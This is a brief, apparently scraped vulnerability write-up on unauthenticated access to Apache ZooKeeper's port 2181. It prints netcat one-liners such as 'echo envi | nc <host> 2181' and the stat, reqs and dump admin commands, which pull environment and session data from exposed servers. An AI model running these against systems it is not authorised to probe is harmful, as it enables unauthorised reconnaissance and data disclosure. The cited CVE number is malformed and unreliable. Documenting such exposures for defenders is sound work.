Apache Zookeeper Unauthorized Access Vulnerability Cve 2014 085
Apache Zookeeper Unauthorized Access Vulnerability Cve 2014 085
Apache ZooKeeper Unauthorized Access Vulnerability CVE-2014-085
Vulnerability Description
By default, the configured zookeeper allows unauthorized access, and the administrator does not configure the access control list (ACL).
Vulnerability Impact
Apache ZooKeeper
Vulnerability reappears
Apache ZooKeeper opens 2181 port by default, and uses the following command to obtain sensitive data.
1
echo envi | nc xxx.xxx.xxx.xxx 2181
Other information
1
2
3
4
5
6
7
8
9
10
11
12
13
14
1、stat:列出关于性能和连接的客户端的统计信息。
echo stat |ncat 127.0.0.1 2181
2、ruok:测试服务器是否运行在非错误状态。
echo ruok |ncat 127.0.0.1 2181
3、reqs:列出未完成的请求。
echo reqs |ncat 127.0.0.1 2181
4、envi:打印有关服务环境的详细信息。
echo envi |ncat 127.0.0.1 2181
5、dump:列出未完成的会话和临时节点。
echo dump |ncat 127.0.0.1 2181
This post is licensed under CC BY 4.0 by the author.